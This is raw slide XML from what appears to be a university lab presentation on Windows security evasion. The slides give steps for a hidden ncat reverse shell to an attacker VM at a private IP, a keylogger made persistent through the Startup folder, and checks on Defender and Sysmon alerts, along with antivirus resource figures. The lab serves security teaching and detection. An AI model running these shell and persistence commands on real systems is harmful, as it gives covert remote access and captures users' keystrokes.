          <a:ext cx="1082320" cy="1082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B1654-6854-4B4C-BA96-AA806E9A3C51}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7268932" y="1511171"/>
          <a:ext cx="3092343" cy="46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000" b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Silent Launch</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3000" b="1" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7268932" y="1511171"/>
        <a:ext cx="3092343" cy="463851"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EC6924BF-E1BF-4CBF-8F5B-4858C0C27865}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7268932" y="2030274"/>
          <a:ext cx="3092343" cy="104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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Batch script runs:</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-GB" sz="1700" b="0" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" b="0" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t> start /min </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" b="0" kern="1200" err="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>cmd</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" b="0" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t> /c "cd %APPDATA%\\…\\Startup &amp; python keylog.py"</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" b="0" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7268932" y="2030274"/>
        <a:ext cx="3092343" cy="10423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9AB71-FF1F-4106-A550-6C5FB424EEB5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1006935" y="431426"/>
          <a:ext cx="1082320" cy="1082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F89C8-5C7E-4E84-A74B-9A80CE8DAFD8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1924" y="1622098"/>
          <a:ext cx="3092343" cy="46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700" b="0" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t> Prepare the Tool </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2700" b="0" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Calibri"/>
            <a:ea typeface="Calibri"/>
            <a:cs typeface="Calibri"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1924" y="1622098"/>
        <a:ext cx="3092343" cy="463851"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A96AE001-0FAD-4242-9723-C8DDAC7FD9B6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1924" y="2136346"/>
          <a:ext cx="3092343" cy="81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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t> Ensure ncat.exe is present (download via winget or curl).</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1700" b="0" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1924" y="2136346"/>
        <a:ext cx="3092343" cy="814885"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{774462F3-C667-490E-8DB4-2DAF4D942B0B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4640439" y="431426"/>
          <a:ext cx="1082320" cy="10823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EA02A-7C79-42F1-B8AB-F8EB91CFF3EB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3635428" y="1622098"/>
          <a:ext cx="3092343" cy="46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700" b="0" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t> Launch Reverse Shell  </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2700" b="0" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Calibri"/>
            <a:ea typeface="Calibri"/>
            <a:cs typeface="Calibri"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3635428" y="1622098"/>
        <a:ext cx="3092343" cy="463851"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3B7EAFBE-4AA1-49F4-9FC6-01AD93752EA0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3635428" y="2136346"/>
          <a:ext cx="3092343" cy="81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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t>Hidden execution:</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-GB" sz="1700" b="0" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" b="0" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t> start /min cmd /c "ncat 172.20.10.15 12345 -e cmd.exe"</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" b="0" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Calibri"/>
            <a:ea typeface="Calibri"/>
            <a:cs typeface="Calibri"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3635428" y="2136346"/>
        <a:ext cx="3092343" cy="814885"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DB928308-77B1-4279-8CC9-4D4857E3BF72}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8273943" y="431426"/>
          <a:ext cx="1082320" cy="10823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9F12D-2699-4044-9A81-91AB9C2E889A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7268932" y="1622098"/>
          <a:ext cx="3092343" cy="46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700" b="0" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t>Verify C2 Channel</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2700" b="0" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Calibri"/>
            <a:ea typeface="Calibri"/>
            <a:cs typeface="Calibri"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7268932" y="1622098"/>
        <a:ext cx="3092343" cy="463851"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{44FEA4E3-C168-4BBB-9E6A-D46BFF2B3254}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7268932" y="2136346"/>
          <a:ext cx="3092343" cy="81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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t> Attacker VM should receive an interactive shell on port 12345.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" b="0" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Calibri"/>
            <a:ea typeface="Calibri"/>
            <a:cs typeface="Calibri"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7268932" y="2136346"/>
        <a:ext cx="3092343" cy="8148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3EA1C-AF21-42CE-B2D5-F56BE2D69380}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1006935" y="296317"/>
          <a:ext cx="1082320" cy="1082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5C1A7-5357-4DA2-8F51-5B2F90E39E27}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1924" y="1498608"/>
          <a:ext cx="3092343" cy="46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900" kern="1200">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t>Deploy the Persister</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="2900" kern="1200" err="1">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="Calibri"/>
            <a:cs typeface="Calibri"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1924" y="1498608"/>
        <a:ext cx="3092343" cy="463851"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C4C3C821-1A53-496A-83DD-F13276F982FC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1924" y="2018260"/>
          <a:ext cx="3092343" cy="1068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Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t>Batch snippet (already in cmd_commands.bat):</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-GB" sz="1700" kern="1200">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
          </a:br>
          <a:endParaRPr lang="en-GB" sz="1700" kern="1200">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="Calibri"/>
            <a:cs typeface="Calibri"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1924" y="2018260"/>
        <a:ext cx="3092343" cy="1068079"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EE44528B-84A9-4290-930D-E77705BF8132}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4640439" y="296317"/>
          <a:ext cx="1082320" cy="10823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3025E-8C4F-42C8-BD97-DC6D36F3173A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3635428" y="1498608"/>
          <a:ext cx="3092343" cy="46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900" kern="1200">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t>Reboot Validation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3635428" y="1498608"/>
        <a:ext cx="3092343" cy="463851"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0BB33479-4539-47D0-BB02-6FE8B7AED7BB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3635428" y="2018260"/>
          <a:ext cx="3092343" cy="1068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Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t>Restart VM; verify sys_upd.bat auto-runs keylogger.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3635428" y="2018260"/>
        <a:ext cx="3092343" cy="1068079"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8E7B12A5-75A8-4926-BF94-F7EEFBFBB4E7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8273943" y="296317"/>
          <a:ext cx="1082320" cy="10823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C9CDB-FF38-47AC-861B-1976850D87DC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7268932" y="1498608"/>
          <a:ext cx="3092343" cy="46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900" kern="1200">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t>Monitor Defences</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7268932" y="1498608"/>
        <a:ext cx="3092343" cy="463851"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{523A164B-A7F1-430C-B297-786D8E7BD7FC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7268932" y="2018260"/>
          <a:ext cx="3092343" cy="1068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Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t>Check Defender ASR “Block persistence via Startup folder” alerts, Sysmon Event 11 (FileCreate).</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7268932" y="2018260"/>
        <a:ext cx="3092343" cy="10680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76635-BF20-4F73-B074-E8F8B33EDB36}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="306551"/>
          <a:ext cx="5983329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373" tIns="354076" rIns="464373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GB" sz="1700" b="0" kern="1200"/>
            <a:t>4.5 MB RAM, ~0% CPU </a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1700" kern="1200">
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="306551"/>
        <a:ext cx="5983329" cy="709537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{48F303FD-0654-4D4B-A8CB-4A45CA7E9C44}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="299166" y="55631"/>
          <a:ext cx="418833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309" tIns="0" rIns="15830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b="0" kern="1200"/>
            <a:t>Windows Defender</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" kern="1200"/>
            <a:t> (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" kern="1200" err="1"/>
            <a:t>SecurityHealth</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" kern="1200"/>
            <a:t>)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" b="1" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="323664" y="80129"/>
        <a:ext cx="4139334" cy="452844"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BE980F8F-9B2C-4AEA-867A-42F5A6237F0E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1358809"/>
          <a:ext cx="5983329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373" tIns="354076" rIns="464373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kern="1200"/>
            <a:t>46 MB RAM, ~0.01% CPU</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1700" b="0" kern="1200">
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1358809"/>
        <a:ext cx="5983329" cy="709537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{65226CF2-E01E-48E1-9785-0337E60814BF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="299166" y="1107889"/>
          <a:ext cx="418833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309" tIns="0" rIns="15830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Grandview Display"/>
            </a:rPr>
            <a:t>BitDefender</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" b="1" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="323664" y="1132387"/>
        <a:ext cx="4139334" cy="452844"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{252BCE06-0926-4D6C-9114-08772B617AD5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2411066"/>
          <a:ext cx="5983329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373" tIns="354076" rIns="464373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kern="1200">
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>5.77</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" b="0" kern="1200"/>
            <a:t> % CPU,</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" b="0" kern="1200">
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t> 311</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" b="0" kern="1200"/>
            <a:t> MB RAM, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" b="0" kern="1200">
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>16.38 MB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" b="0" kern="1200"/>
            <a:t> I/O (during active capture)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2411066"/>
        <a:ext cx="5983329" cy="963900"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2DFF8794-1BEB-4BAE-AC36-DB12F1EFF036}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="299166" y="2160146"/>
          <a:ext cx="418833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309" tIns="0" rIns="15830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>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Kaspersky</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1700" b="0" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="323664" y="2184644"/>
        <a:ext cx="4139334" cy="452844"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FE0723A4-A68F-4E35-9E13-C6F74ED92A2B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3717686"/>
          <a:ext cx="5983329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373" tIns="354076" rIns="46437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kern="1200"/>
            <a:t>   ~6% CPU, ~400 MB RAM, moderate I/O spikes</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3717686"/>
        <a:ext cx="5983329" cy="709537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{953F92B8-4E50-477C-BD43-BA7C150110A5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="299166" y="3466766"/>
          <a:ext cx="418833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309" tIns="0" rIns="158309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/>
            <a:t>Total system resource impact (peak):  </a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1700" b="0" kern="1200">
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="323664" y="3491264"/>
        <a:ext cx="413933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EC0B5C-07E5-CAC4-31A3-627F25496B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27E26-33BC-1D49-FB3D-2DA78E75FF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19061-6962-C443-A286-E1FCE14B6E29}" type="datetimeFigureOut">
              <a:rPr lang="en-BE" smtClean="0"/>
              <a:t>12/05/2025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4F45E-0849-6CF3-E590-14567AC420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652E2-F70B-C263-FE16-205C9400F2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98973-71E7-3547-835D-130748A38BB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67463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12DEE-47E5-6145-BB6B-7A2B99A86E19}" type="datetimeFigureOut">
              <a:rPr lang="en-BE" smtClean="0"/>
              <a:t>12/05/2025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3A2EA-96EC-E341-8DE3-F5717018214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636644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A2EA-96EC-E341-8DE3-F57170182147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35398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A2EA-96EC-E341-8DE3-F57170182147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00266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A2EA-96EC-E341-8DE3-F57170182147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41891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A2EA-96EC-E341-8DE3-F57170182147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97343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A2EA-96EC-E341-8DE3-F57170182147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90067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A2EA-96EC-E341-8DE3-F57170182147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0730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A2EA-96EC-E341-8DE3-F57170182147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72365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A2EA-96EC-E341-8DE3-F57170182147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64006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A2EA-96EC-E341-8DE3-F57170182147}" type="slidenum">
              <a:rPr lang="en-BE" smtClean="0"/>
              <a:t>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5030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A2EA-96EC-E341-8DE3-F57170182147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8224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A2EA-96EC-E341-8DE3-F57170182147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0986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A2EA-96EC-E341-8DE3-F57170182147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5501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A2EA-96EC-E341-8DE3-F57170182147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4728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A2EA-96EC-E341-8DE3-F57170182147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0333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A2EA-96EC-E341-8DE3-F57170182147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0768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A2EA-96EC-E341-8DE3-F57170182147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2071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A2EA-96EC-E341-8DE3-F57170182147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20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8924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84790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43582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972351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9495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44573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35621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0582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01289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1753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75391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63904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1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e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nmap.org/ncat/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pynput.readthedocs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87E5-4B6F-090B-A162-DBD02C971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600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Grandview Display"/>
                <a:ea typeface="Calibri Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Advanced Security Evasion in Windows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C6AB3-4668-C6A8-5EE8-E1651E1A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20FBB-69B3-DD9E-CC6E-B14B065B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9F1-38AA-0941-991C-3B703E9E025F}" type="slidenum">
              <a:rPr lang="en-BE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D0A4E-2098-4D11-3769-03323060BBBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638881" y="5660607"/>
            <a:ext cx="10909643" cy="552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chemeClr val="tx2">
                    <a:lumMod val="76000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Operating Systems and Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="A blue and orange text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63E7D018-4217-72EC-AF63-6D1A4431A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373" y="591670"/>
            <a:ext cx="5928657" cy="274200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26C02D5-ACCA-D31C-9CF1-074BEC730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478" y="6806803"/>
            <a:ext cx="6096000" cy="5279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7CE7308-ABD8-7BFF-4AEC-252116C0C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" y="6806803"/>
            <a:ext cx="6096000" cy="52797"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Graphic 11" descr="Bug with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B382D684-5981-894C-28C8-6A7269ED6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-1860000">
            <a:off x="5630607" y="18820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22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FBA1-0661-8C52-C1B3-1281EF97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>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Backdoor / Command-and-Control – Experimental Steps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="320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11013-176A-726E-71A8-9366D496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7D02FFC-D92C-40C9-946B-E9820E5B199A}" type="datetime1">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>12/05/2025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CA732-C99F-DB7D-9638-FD533441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273" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B2234A6-6881-E706-4539-A7043BE73F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192086"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
